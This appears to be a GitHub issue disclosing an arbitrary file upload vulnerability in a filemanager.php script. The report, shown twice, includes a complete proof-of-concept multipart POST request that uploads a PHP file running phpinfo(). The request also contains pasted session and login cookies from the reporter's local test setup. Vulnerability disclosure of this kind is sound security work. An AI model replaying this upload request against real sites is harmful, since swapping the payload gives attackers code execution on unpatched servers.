Open liao10086 opened 6 years ago
hi, I found an arbitrary file upload vulnerability in filemanager.php 1.when I add a file,I can add a php file
2.access the test.php
POC: POST /filemanager.php?field=onmouseoversrc&url= HTTP/1.1 Host: localhost Content-Length: 512 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKbCCaxrNdKm4nFp User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 DNT: 1 Referer: http://localhost/filemanager.php?field=onmouseoversrc&url= Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; pfa_uuid=e0196bb6066655745cde036f563b8ed7; com.wibu.cm.webadmin.lang=zh-CN; UM_distinctid=1651900b111131-081d53427a68f9-3a614f0b-1aeaa0-1651900b1129bf; CNZZDATA5812519=cnzz_eid%3D697695792-1533722469-http%253A%252F%252Flocalhost%252F%26ntime%3D1533722469; theme=43605befe128722a18cc84a63288d33d836e74e8%7Edefault; authautologin=c882f8571804fee33e968c450ec495a4b884a998%7E8f05700f2b069bd5f06d67136091704a2168b821; sidebar_state=not-collapsed; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1534141480; PHPSESSID=3hqbdg26in79vo81tpqv9qo2s5; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1533538539,1534148242; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1534150276; Login=pl79357g4631s6p2e7333gut42; ui-tabs-1=1 Connection: close
------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="return"
files ------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_file"; filename="test.php" Content-Type: application/octet-stream
<?php phpinfo(); ?> ------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_resize"
------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_rotate"
0 ------WebKitFormBoundaryHKbCCaxrNdKm4nFp--
Please limit upload file type I hope you can fix it author by:xijun.liao@dbappsecurity.com.cn
hi, I found an arbitrary file upload vulnerability in filemanager.php 1.when I add a file,I can add a php file
2.access the test.php
POC: POST /filemanager.php?field=onmouseoversrc&url= HTTP/1.1 Host: localhost Content-Length: 512 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHKbCCaxrNdKm4nFp User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8 DNT: 1 Referer: http://localhost/filemanager.php?field=onmouseoversrc&url= Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_48659a4ab85f1bcebb11d3dd3ecb6760=1531379042; greencms_post_add1=x%9C%85%8FK%0B%C20%10%84%FF%8A%EC%C1S%C5%24%B4M%8D%E2%C5%83%27O%1E%8DH%1Fi%0D%D44%98%CDA%C4%FFnJ%7D%80%82%9E%96%99%FDf%97%B9%82%ED%1C%1EPc%AB%40%80%F4i%C1%98%F4Y%5D%2A%E9%E3%9A%D7%D2%F3%84e%EB%B3Rf%B5%D9B4%F0egP%19%0C%89%85%5D%8EM%E1%EC%7C%F4%7F%F4%17S%22%7D2%E3U%14%84%A2i%7F%3E.%7F%85%16rj%97%E1o%99%A3%03%B1%03%0A%FB%080o%DEbhp%B1%7D%01%A7M%13%9A%3CL%879%FA%00%82%F5E%AB%DD%F1%E9%A3%3A%D96%C7%EF%00v6x%E4%29%AB%81a%84f%13%C2%27%94%8Dh%22%E8L%D0%17q%EA%2A%5DkU%7DP%A9+%5C%C4%2FJ%F7%7B%0A%B7%3B%29%BCqm; Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1532595699; tm=20e0109ed56458f613d642c25308ebcc; pfa_uuid=e0196bb6066655745cde036f563b8ed7; com.wibu.cm.webadmin.lang=zh-CN; UM_distinctid=1651900b111131-081d53427a68f9-3a614f0b-1aeaa0-1651900b1129bf; CNZZDATA5812519=cnzz_eid%3D697695792-1533722469-http%253A%252F%252Flocalhost%252F%26ntime%3D1533722469; theme=43605befe128722a18cc84a63288d33d836e74e8%7Edefault; authautologin=c882f8571804fee33e968c450ec495a4b884a998%7E8f05700f2b069bd5f06d67136091704a2168b821; sidebar_state=not-collapsed; Hm_lvt_3155433929be1afd6cef849b9709d4d7=1534141480; PHPSESSID=3hqbdg26in79vo81tpqv9qo2s5; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1533538539,1534148242; Hm_lvt_12fc28a048b3367aa46f20380b6678ff=1534150276; Login=pl79357g4631s6p2e7333gut42; ui-tabs-1=1 Connection: close
------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="return"
files ------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_file"; filename="test.php" Content-Type: application/octet-stream
<?php phpinfo(); ?> ------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_resize"
------WebKitFormBoundaryHKbCCaxrNdKm4nFp Content-Disposition: form-data; name="new_rotate"
0 ------WebKitFormBoundaryHKbCCaxrNdKm4nFp--
Please limit upload file type I hope you can fix it author by:xijun.liao@dbappsecurity.com.cn